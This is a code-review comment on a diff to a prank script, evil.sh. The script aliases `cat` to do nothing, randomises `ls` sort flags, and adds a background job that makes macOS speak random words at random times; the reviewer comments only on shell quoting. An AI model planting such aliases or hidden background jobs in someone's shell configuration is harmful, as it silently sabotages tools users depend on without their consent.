evil.sh

```diff
@@ -56,6 +56,11 @@ annoying && alias cat=true;
 # Use a random sort option whenever `ls` is invoked.
 annoying && function ls { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
 
+Taunt OS X users with random words through their speakers
+annoying && if [ "$(uname)" = 'Darwin' ]; then
+  sh -c 'sleep $[($RANDOM % 900) + 300]s; say $(head -$(($RANDOM % $(wc -l < /usr/share/dict/words) + 1)) /usr/share/dict/words | tail -2);' &
```

Comment:
There should be a lot of quotation here.
Pretty much everything containing a `$` sign should be quoted.

Compare e.g. the following:

```bash
echo $(foo $(bar $BAZ))
echo "$(foo "$(bar "${BAZ}")")"
```

The first line will at some point fail if something goes wrong and the output of a command is not exactly one (think of 0 or 2+) word.